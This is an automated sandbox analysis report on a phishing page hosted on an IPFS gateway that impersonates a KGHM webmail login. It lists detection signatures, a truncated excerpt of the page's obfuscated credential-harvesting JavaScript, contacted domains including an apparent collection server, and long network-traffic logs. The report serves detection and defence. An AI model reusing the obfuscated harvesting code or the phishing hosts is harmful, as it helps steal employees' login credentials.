Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com

Overview

General Information

Sample URL:https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com
Analysis ID:1543737

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish45
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Uses IPFS gateway to access IPFS content in browser (often used in phishing/scams)
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2028,i,18378094711220502365,9901515927781828100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security
    1.3.pages.csvJoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security
      1.2.pages.csvJoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comLLM: Score: 9 Reasons: The brand 'KGHM' is a known Polish multinational corporation primarily involved in mining and metallurgy., The URL 'ipfs.io' does not match the legitimate domain 'kghm.com' associated with the KGHM brand., The domain 'ipfs.io' is associated with the InterPlanetary File System (IPFS), which is unrelated to KGHM., Presence of a password input field on a non-legitimate domain for KGHM increases the suspicion of phishing., The use of a generic domain like 'ipfs.io' for a specific brand like KGHM is unusual and suspicious. DOM: 1.2.pages.csv
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: (function(_0x229330,_0xbedbc4){function _0x36475e(_0x22ca2e,_0x341dd7,_0x525b00,_0x26d2a2,_0x1cf23b
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: function _0x1eae(_0xde9c8d,_0x38946e){var _0x164fe8=_0x28c9();return _0x1eae=function(_0x2e25c9,_0x
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: function _0x273f(_0x7ba5b9,_0x2e08dc){var _0x32c00f=_0x2284();return _0x273f=function(_0x1a9891,_0x
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: function _0x1eae(_0xde9c8d,_0x38946e){var _0x164fe8=_0x28c9();return _0x1eae=function(_0x2e25c9,_0x174cd6){_0x2e25c9=_0x2e25c9-0x6b;var _0x21b658=_0x164fe8[_0x2e25c9];return _0x21b658;},_0x1eae(_0xde9c8d,_0x38946e);}function _0x28c9(){var _0x10745d=['table','html','#loader_email','ready','(((.+)+)+)+$','prototype','signal','1loryva','#tit','505xaslds','touppercase','117448czgiry','tolowercase','replace','33954hkgtmo','6693480vblrot','https://','3272511wgaujs','ajax','{}.constructor(\x22return\x20this\x22)(\x20)','preventdefault','35qaquuk','#contact','debugger','#password','action','return\x20(function()\x20','log','show','bind','search','json','3112988cpplcs','console','substr','apply','post','constructor','2951692wuqyui','#email','#auth_reg','return\x20(function()\x20{}.constructor(\x22return\x20this\x22)(\x20));','#toto','exception','hash','while\x20(true)\x20{}','attr','#pussy','string','length','10671130tpnhyp','tostring','#error','val','trace','serialize','#submit-btn'];_0x28c9=function(){return _0x107...
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Gateway: ipfs.io
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Number of links: 0
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Title: WEBMAIL PORTAL AUTHENTICATION does not match URL
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Invalid link: Privacy
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Invalid link: Privacy
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Invalid link: Privacy
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Invalid link: Privacy
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comSample URL: PII: test@kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Iframe src: https://kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Iframe src: https://kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Iframe src: https://kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: Iframe src: https://kghm.com
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: <input type="password" .../> found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="author".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="author".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="author".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="author".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="copyright".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="copyright".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="copyright".. found
        Source: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49862 version: TLS 1.2
        Source: chrome.exeMemory has grown: Private usage: 24MB later: 54MB
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: global trafficDNS traffic detected: DNS query: ipfs.io
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
        Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: kghm.com
        Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
        Source: global trafficDNS traffic detected: DNS query: ipapi.co
        Source: global trafficDNS traffic detected: DNS query: webmail.supremecluster.com
        Source: global trafficDNS traffic detected: DNS query: server.mailxlsxpdfauth.com
        Source: global trafficDNS traffic detected: DNS query: static.addtoany.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
